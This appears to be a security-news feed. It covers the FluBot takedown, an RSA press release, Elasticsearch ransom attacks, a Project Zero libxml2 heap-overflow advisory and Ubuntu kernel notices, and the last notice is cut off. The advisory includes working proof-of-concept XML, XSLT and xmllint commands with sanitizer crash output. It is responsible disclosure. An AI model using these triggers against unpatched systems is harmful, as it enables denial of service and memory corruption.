Security researchers have described the malware as among the fastest-spreading mobile threats in recent years.

An international team of law-enforcement officials has successfully disrupted infrastructure associated with FluBot, an especially pernicious malware tool that threat actors have been using since at least December 2020 to steal passwords, bank account details, and other sensitive data from Android users.

Europol announced the takedown Wednesday, noting that FluBot's infrastructure was now under the control of law enforcement.

"An international law enforcement operation involving 11 countries has resulted in the takedown of one of the fastest-spreading mobile malware to date," Europol noted. "The investigation is ongoing to identify the individuals behind this global malware campaign."

Researchers first spotted FluBot (at that time referred to as Cabassous) targeting Android users in Spain in December 2020. Over the course of the next year, the malware spread like wildfire to what Europol described as a "huge number" of Android devices in multiple countries, including Germany, the UK, France, Finland, Australia, and New Zealand.

**A Fast-Spreading Viral Threat**

FluBot spreads via SMS phishing messages (smishing) that use various pretexts to try and get recipients to click on a link for downloading the malware to their smartphones. In the early days of the malware, the SMS messages purported to be from delivery companies such as FedEx and DHL attempting to drop off a package. Users who were tricked into clicking on the link — ostensibly to reschedule delivery — ended up with the malware, disguised as a mobile app from the delivery company, downloaded to their Android devices.

Once installed, the malware seeks specific access privileges on the device that, if granted, it would use to steal payment-card data, bank account information, and other sensitive data. The malware was also designed to intercept and read text messages, open pages, disable Google Play Protect, and uninstall various apps from an infected device.

In addition, FluBot copies the infected device owner's contact list and sent SMS messages with infected links to all the numbers — a factor that likely contributed to its rapid spread, according to security vendor Bitdefender. The authors of the malware likely sold it as a service to different threat actors, too, contributing to its viral spread.

Over the course of 2021, threat actors used different SMS messages to try and trick users to click on the malicious link, including one that purported to be from a friend wanting to share a photo and another that tried to get users to listen to a fake voicemail message. Researchers from Bitdefender even observed attackers sending SMS phishing messages that ironically enough warned recipients about their devices being infected with FluBot and to take remedial action by clicking on the message link. In a report this January, Bitdefender identified Australia as the country most hit by FluBot, followed by Germany, Poland, Spain, and Austria.

Researchers from Proofpoint who tracked FluBot last year reported observing FluBot SMS messages in both English and German. The vendor said it had identified more than 700 unique domains that FluBot actors used for the English-language campaign alone.

**Android Threats Continue to Surge**

The FluBot takedown eliminates — temporarily — one of the biggest threats to Android device users in recent years. However, numerous other similar malware tools in the wild continue to present a serious threat. A recent report from ThreatFabric identified a continued increase in Android malware families such as Joker that enable fraudulent transactions being initiated from an infected device. Other examples include Alien, Cerberus, Hydra, and Octo.

The increase in Android malware families has also been accompanied by an increase in the number of malware droppers disguised as legitimate apps on Google's official Play mobile app store, ThreatFabric said. Among them is an app called NanoCleaner, which has been downloaded more than 10,000 times. In actuality, NanoCleaner is a dropper for Hydra.

Similarly, another app called Pocket Screencaster, with more than 10,000 installs, is a dropper for Octo, and another called Fast Cleaner, with more than 50,000 installs, is really a dropper for Alien and Octo.

"Threat actors continue to consider droppers on Google Play as one of the most effective ways to deliver malware to victims," ThreatFabric said.

FluBot Android Malware Operation Disrupted, Infrastructure Seized

New operational analytics and AI/ML platform drives contextual intelligence and prioritized actions to anticipate risky behaviors, disrupt threats and insure business resilience.

SAN JOSE, Calif. , June 1, 2022 /PRNewswire/ -- Netenrich, a leading security and operations analytics SaaS company, today announced that the company will showcase its new Resolution Intelligence platform® at the 2022 RSA Conference on June 6-9 at the Moscone Center in San Francisco. Netenrich will feature product demos and present platform details in the Google Cloud Security Booth #1943, South Expo Hall.

**Netenrich at RSA 2022  
**Netenrich invites security professionals and conference attendees to learn how they can optimize their security operations with analytics leveraging Google Chronicle. Managed service providers (MSSPs, MSPs, GSIs) benefit by plugging into the data analytics platform to quickly build innovative services and transform their business at service-provider scale.

Netenrich will share the latest advances in security operations, as well as the strategies and solutions security professionals need to secure their data against the most critical issues and behaviors. Visit booth #1943 during the times listed below:

*   Tuesday, June 7 from 10:00 AM – 12:00 PM PDT
*   Wednesday, June 8 from 4:00 PM – 6:00 PM PDT
*   Thursday, June 9 from 10:00 AM – 12:00 PM PDT

**Theater Presentation in booth**

*   Thursday, June 9 at 11:45 AM PDT

**Netenrich + Chronicle Happy Hour**

RSA attendees are invited to the Netenrich + Chronicle Happy Hour at the Monarch club on Wednesday, June 8, from 6 – 9 pm PDT. Come enjoy music, drinks, and live entertainment.

*   RSVP to secure your invite and bring your ID and RSA badge
*   **Monarch, 101 6th Street, San Francisco, CA 94114**

Follow Netenrich on Twitter , LinkedIn, and YouTube

SOURCE Netenrich

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Netenrich Debuts Resolution Intelligence Secure Digital Operations Platform at RSA 2022

The cloud instances were left open to the public Internet with no authentication, allowing attackers to wipe the data.

Cyberattackers are targeting misconfigured Elasticsearch cloud buckets exposed on the public Internet and stealing the wide-open data, then replacing it with a ransom note.

According to Secureworks Counter Threat Unit (CTU) researchers, more than 1,200 indexes have already been affected, with the attackers issuing 450 requests for Bitcoin payment in exchange for the return of the data. However, the ransom amounts are relatively low, researchers have pointed out: Taken together, all of the demands total just $280,000.

"The average ransom request was approximately $620 payable to one of two Bitcoin wallets," they noted in a Wednesday analysis. "As of this publication, both wallets are empty and do not appear to have been used to transact funds related to the ransoms."

Despite the lackluster follow-through on the part of attackers thus far, the situation highlights a serious issue: Misconfiguration of databases placed in the public cloud has reached epidemic proportions, with large numbers of enterprises mistakenly leaving storage buckets from Amazon Web Services, Google Cloud, and Microsoft Azure accessible with no authentication to read or write the data.

Often, these open instances are discovered by security researchers and locked down without incident — but system misconfigurations still drove an estimated 13% of overall malicious system breaches recorded in the recent Verizon's 2022 "Data Breach Investigations Report" (DBIR), with misconfigured cloud storage instances making up the bulk of those.

"Unsecured Elasticsearch instances are trivially easy to identify using the Shodan search engine," the CTU researchers noted. "The threat actor probably used an automated script to identify the vulnerable databases, wipe the data, and drop the ransom note."

They added, "the cost of storing data from 1,200 databases would be prohibitively expensive. It is therefore likely that the data was not backed up and that paying the ransom would not restore it."

In 2020, ESET researchers uncovered a similar attack that affected half of all exposed MongoDB instances, which were wiped and replaced with a ransom note.

12K Misconfigured Elasticsearch Buckets Ravaged by Extortionists

libxml2 is vulnerable to a heap buffer overflow when xmlBufAdd is called on a very large buffer.

    libxml2: heap-buffer-overflow in xmlBufAddlibxml2 is vulnerable to a heap-buffer-overflow when xmlBufAdd is called on a very large buffer:```intxmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {    unsigned int needSize;    [..]    needSize = buf->use + len + 2; (A)    if (needSize > buf->size){        [..]        if (!xmlBufResize(buf, needSize)){            xmlBufMemoryError(buf, \"growing buffer\");            return XML_ERR_NO_MEMORY;        }    }    [..]    memmove(&buf->content[buf->use], str, len*sizeof(xmlChar)); (C)    buf->use += len;    buf->content[buf->use] = 0;    [..]}```For large buffers with `buf->use` and `buf->size` close to 2**32, the calculation in *A* can overflow, resulting in a small value for needSize. This will skip the reallocation of the buffer in *B* and can lead to an out-of-bounds write in *C*.One way to trigger this bug is to call `xmlNodeGetContent` on a node with multiple large child elements. This triggers the overflow when `xmlBufGetNodeContent` iterates through its children to add their content to the buffer. Exploiting this issue using static XML requires that the `XML_PARSE_HUGE` flag is used to disable hardcoded parser limits. If XSLT is used, large nodes can be created dynamically and `XML_PARSE_HUGE` isn't necessary. _Note: XML_PARSE_HUGE looks very brittle in general. Signed 32-bit integers are widely used as sizes/offsets throughout the codebase, a lot of the helper functions don't handle inputs larger than 4GB correctly and fuzzers won't trigger these edge cases. Maybe that flag should include a security warning? Some security critical projects like xmlsec enable it by default (https://github.com/lsh123/xmlsec/commit/3786af10953630cd2bb2b57ce31c575f025048a8) which seems risky._Proof of Concept: XML only (we use \u2013xpath only to trigger a call to xmlNodeGetContent):```$ python3 -c 'print(\"<test>\\" + (\"\" + \"A\"*(2**30) +  \"\\")*4 +  \"</test>\\")' > /tmp/huge.xml$ ./xmllint --huge --xpath '/test[string-length() < \"4\"]' /tmp/huge.xml===================================================================93182==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f0087e0780f at pc 0x00000049c682 bp 0x7ffee51cc270 sp 0x7ffee51cba38WRITE of size 1073741824 at 0x7f0087e0780f thread T0    #0 0x49c681 in __asan_memmove (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x49c681)    #1 0x6ee851 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:908:5    #2 0x595fdc in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33    #3 0x5964bf in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c    #4 0x669c37 in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16    #5 0x669c37 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8933:16    #6 0x68de92 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17    #7 0x68b15e in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13020:22    #8 0x68a808 in xmlXPathCompOpEvalToBoolean /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13599:6    #9 0x696974 in xmlXPathNodeSetFilter /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:11674:15    #10 0x692b36 in xmlXPathNodeCollectAndTest /usr/local/google/home/fwilhelm/code/libxml2/xpath.c    #11 0x68c6ed in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13115:26    #12 0x68b61f in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26    #13 0x679516 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2    #14 0x679b8d in xmlXPathEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14473:5    #15 0x4d6858 in doXPathQuery /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2157:11    #16 0x4d6858 in parseAndPrintFile /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2472:9    #17 0x4d1bd8 in main /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:3817:7    #18 0x7f02a712c7ec in __libc_start_main csu/../csu/libc-start.c:332:16    #19 0x420609 in _start (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x420609)0x7f0087e0780f is located 0 bytes to the right of 3221225487-byte region [0x7effc7e07800,0x7f0087e0780f)allocated by thread T0 here:    #0 0x49d0b3 in __interceptor_realloc (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x49d0b3)    #1 0x6eddb3 in xmlBufResize /usr/local/google/home/fwilhelm/code/libxml2/buf.c:829:26    #2 0x6ee7f8 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:902:14    #3 0x595fdc in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33    #4 0x5964bf in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c    #5 0x669c37 in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16    #6 0x669c37 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8933:16    #7 0x68de92 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17    #8 0x68b15e in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13020:22    #9 0x68a808 in xmlXPathCompOpEvalToBoolean /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13599:6    #10 0x696974 in xmlXPathNodeSetFilter /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:11674:15    #11 0x692b36 in xmlXPathNodeCollectAndTest /usr/local/google/home/fwilhelm/code/libxml2/xpath.c    #12 0x68c6ed in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13115:26    #13 0x68b61f in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26    #14 0x679516 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2    #15 0x679b8d in xmlXPathEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14473:5    #16 0x4d6858 in doXPathQuery /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2157:11    #17 0x4d6858 in parseAndPrintFile /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2472:9    #18 0x4d1bd8 in main /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:3817:7    #19 0x7f02a712c7ec in __libc_start_main csu/../csu/libc-start.c:332:16SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x49c681) in __asan_memmoveShadow bytes around the buggy address:  0x0fe090fb8eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  0x0fe090fb8ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  0x0fe090fb8ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  0x0fe090fb8ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  0x0fe090fb8ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00=>0x0fe090fb8f00: 00[07]fa fa fa fa fa fa fa fa fa fa fa fa fa fa  0x0fe090fb8f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  0x0fe090fb8f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  0x0fe090fb8f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  0x0fe090fb8f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  0x0fe090fb8f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa faShadow byte legend (one shadow byte represents 8 application bytes):  Addressable:           00  Partially addressable: 01 02 03 04 05 06 07  Heap left redzone:       fa  Freed heap region:       fd  Stack left redzone:      f1  Stack mid redzone:       f2  Stack right redzone:     f3  Stack after return:      f5  Stack use after scope:   f8  Global redzone:          f9  Global init order:       f6  Poisoned by user:        f7  Container overflow:      fc  Array cookie:            ac  Intra object redzone:    bb  ASan internal:           fe  Left alloca redzone:     ca  Right alloca redzone:    cb==93182==ABORTING```XSLT version (no XML_PARSE_HUGE needed)```<?xml version=\"1.0\"?><test-cases>    <test-case length=\"2048\">A</test-case></test-cases>\u221a fwilhelm2 libxslt % cat poc.xslt<?xml version=\"1.0\"?><xsl:stylesheet version=\"1.0\"    xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"    xmlns:str=\"http://exslt.org/strings\"xmlns:exsl=\"http://exslt.org/common\"    exclude-result-prefixes=\"str\"><xsl:output indent=\"yes\"/><xsl:template match=\"test-cases\">    <test-results>        <xsl:apply-templates select=\"test-case\"/>    </test-results></xsl:template><xsl:template match=\"test-case\">    <test-result>        <xsl:variable name=\"padding\">              <xsl:value-of select=\"str:padding(@length)\"/>        </xsl:variable>        <xsl:variable name=\"l1\">            <xsl:value-of select=\"concat($padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding)\"/>        </xsl:variable>        <xsl:variable name=\"l2\">            <xsl:value-of select=\"concat($l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1)\"/>        </xsl:variable>        <xsl:variable name=\"l3\">            <xsl:value-of select=\"concat($l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2)\"/>        </xsl:variable>        <xsl:variable name=\"l4\">            <xsl:value-of select=\"concat($l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3)\"/>        </xsl:variable>        <xsl:variable name=\"l5\">            <xsl:value-of select=\"concat($l4,$l4,$l4,$l4,$l4,$l4,$l4,$l4)\"/>        </xsl:variable>        <xsl:variable name=\"temp\">          <a><xsl:copy-of select=\"$l5\"/></a>          <a><xsl:copy-of select=\"$l5\"/></a>          <a><xsl:copy-of select=\"$l5\"/></a>          <a><xsl:copy-of select=\"$l5\"/></a>        </xsl:variable>        <foo>          <xsl:value-of select=\"string-length($temp)\"/>        </foo>    </test-result></xsl:template></xsl:stylesheet>\u221a fwilhelm2 libxslt % ./xsltproc/xsltproc poc.xslt poc.xml===================================================================244487==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fe4cc4ee80c at pc 0x0000004b37d2 bp 0x7ffd8a145aa0 sp 0x7ffd8a145268WRITE of size 1073741824 at 0x7fe4cc4ee80c thread T0    #0 0x4b37d1 in __asan_memmove (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x4b37d1)    #1 0x884dc1 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:908:5    #2 0x6dadae in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33    #3 0x6dac8a in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5548:7    #4 0x6db62f in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c    #5 0x7c80fc in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16    #6 0x7c80fc in xmlXPathCastNodeSetToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5733:12    #7 0x7dc654 in xmlXPathCacheConvertString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:2698:8    #8 0x7decca in xmlXPathStringFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8906:21    #9 0x7df931 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8941:5    #10 0x80c5e9 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17    #11 0x808653 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26    #12 0x7ee321 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2    #13 0x7ece3c in xmlXPathCompiledEvalInternal /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14339:11    #14 0x7eca34 in xmlXPathCompiledEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14385:5    #15 0x588140 in xsltPreCompEval /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:385:11    #16 0x589ba5 in xsltValueOf /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:4541:11    #17 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17    #18 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5    #19 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2    #20 0x58cbbc in xsltApplyTemplates /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5095:2    #21 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17    #22 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5    #23 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2    #24 0x57199f in xsltDefaultProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:1997:3    #25 0x570b62 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2129:2    #26 0x593919 in xsltApplyStylesheetInternal /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5987:5    #27 0x4eb14a in xsltProcess /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c    #28 0x4e8cf5 in main /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c:935:6    #29 0x7fe6fc94f7ec in __libc_start_main csu/../csu/libc-start.c:332:16    #30 0x437759 in _start (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x437759)0x7fe4cc4ee80c is located 0 bytes to the right of 3221225484-byte region [0x7fe40c4ee800,0x7fe4cc4ee80c)allocated by thread T0 here:    #0 0x4b4203 in __interceptor_realloc (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x4b4203)    #1 0x8842e0 in xmlBufResize /usr/local/google/home/fwilhelm/code/libxml2/buf.c:829:26    #2 0x884d30 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:902:14    #3 0x6dadae in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33    #4 0x6dac8a in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5548:7    #5 0x6db62f in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c    #6 0x7c80fc in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16    #7 0x7c80fc in xmlXPathCastNodeSetToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5733:12    #8 0x7dc654 in xmlXPathCacheConvertString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:2698:8    #9 0x7decca in xmlXPathStringFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8906:21    #10 0x7df931 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8941:5    #11 0x80c5e9 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17    #12 0x808653 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26    #13 0x7ee321 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2    #14 0x7ece3c in xmlXPathCompiledEvalInternal /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14339:11    #15 0x7eca34 in xmlXPathCompiledEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14385:5    #16 0x588140 in xsltPreCompEval /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:385:11    #17 0x589ba5 in xsltValueOf /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:4541:11    #18 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17    #19 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5    #20 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2    #21 0x58cbbc in xsltApplyTemplates /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5095:2    #22 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17    #23 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5    #24 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2    #25 0x57199f in xsltDefaultProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:1997:3    #26 0x570b62 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2129:2    #27 0x593919 in xsltApplyStylesheetInternal /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5987:5    #28 0x4eb14a in xsltProcess /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c    #29 0x4e8cf5 in main /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c:935:6    #30 0x7fe6fc94f7ec in __libc_start_main csu/../csu/libc-start.c:332:16SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x4b37d1) in __asan_memmoveShadow bytes around the buggy address:  0x0ffd19895cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  0x0ffd19895cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  0x0ffd19895cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  0x0ffd19895ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  0x0ffd19895cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00=>0x0ffd19895d00: 00[04]fa fa fa fa fa fa fa fa fa fa fa fa fa fa  0x0ffd19895d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  0x0ffd19895d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  0x0ffd19895d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  0x0ffd19895d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  0x0ffd19895d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa faShadow byte legend (one shadow byte represents 8 application bytes):  Addressable:           00  Partially addressable: 01 02 03 04 05 06 07  Heap left redzone:       fa  Freed heap region:       fd  Stack left redzone:      f1  Stack mid redzone:       f2  Stack right redzone:     f3  Stack after return:      f5  Stack use after scope:   f8  Global redzone:          f9  Global init order:       f6  Poisoned by user:        f7  Container overflow:      fc  Array cookie:            ac  Intra object redzone:    bb  ASan internal:           fe  Left alloca redzone:     ca  Right alloca redzone:    cb==244487==ABORTING```This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. **The scheduled deadline is 2022-06-06**. For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.htmlRelated CVE Numbers: CVE-2022-29824.Found by: fwilhelm@google.com

libxml2 xmlBufAdd Heap Buffer Overflow

Ubuntu Security Notice 5443-2 - Kyle Zeng discovered that the Network Queuing and Scheduling subsystem of the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or execute arbitrary code. Jann Horn discovered that the Linux kernel did not properly enforce seccomp restrictions in some situations. A local attacker could use this to bypass intended seccomp sandbox restrictions.

==========================================================================  
Ubuntu Security Notice USN-5443-2  
June 01, 2022

linux-gcp-5.13, linux-oracle, linux-oracle-5.13 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 21.10  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-oracle: Linux kernel for Oracle Cloud systems  
- linux-gcp-5.13: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-oracle-5.13: Linux kernel for Oracle Cloud systems

Details:

Kyle Zeng discovered that the Network Queuing and Scheduling subsystem of  
the Linux kernel did not properly perform reference counting in some  
situations, leading to a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2022-29581)

Jann Horn discovered that the Linux kernel did not properly enforce seccomp  
restrictions in some situations. A local attacker could use this to bypass  
intended seccomp sandbox restrictions. (CVE-2022-30594)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 21.10:  
  linux-image-5.13.0-1030-oracle  5.13.0-1030.35  
  linux-image-oracle              5.13.0.1030.30

Ubuntu 20.04 LTS:  
  linux-image-5.13.0-1027-gcp     5.13.0-1027.32~20.04.1  
  linux-image-5.13.0-1030-oracle  5.13.0-1030.35~20.04.1  
  linux-image-gcp                 5.13.0.1027.32~20.04.1  
  linux-image-oracle              5.13.0.1030.35~20.04.1

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
  https://ubuntu.com/security/notices/USN-5443-2  
  https://ubuntu.com/security/notices/USN-5443-1  
  CVE-2022-29581, CVE-2022-30594

Package Information:  
  https://launchpad.net/ubuntu/+source/linux-oracle/5.13.0-1030.35  
  https://launchpad.net/ubuntu/+source/linux-gcp-5.13/5.13.0-1027.32~20.04.1  
  https://launchpad.net/ubuntu/+source/linux-oracle-5.13/5.13.0-1030.35~20.04.1

Ubuntu Security Notice USN-5443-2

Ubuntu Security Notice 5442-2 - Kyle Zeng discovered that the Network Queuing and Scheduling subsystem of the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or execute arbitrary code. Bing-Jhong Billy Jheng discovered that the io_uring subsystem in the Linux kernel contained in integer overflow. A local attacker could use this to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5442-2  
June 01, 2022

linux-gcp-5.4, linux-gkeop, linux-gkeop-5.4, linux-ibm-5.4, linux-oracle,  
linux-oracle-5.4, linux-raspi, linux-raspi-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems  
- linux-oracle: Linux kernel for Oracle Cloud systems  
- linux-raspi: Linux kernel for Raspberry Pi systems  
- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-gkeop-5.4: Linux kernel for Google Container Engine (GKE) systems  
- linux-ibm-5.4: Linux kernel for IBM cloud systems  
- linux-oracle-5.4: Linux kernel for Oracle Cloud systems  
- linux-raspi-5.4: Linux kernel for Raspberry Pi systems

Details:

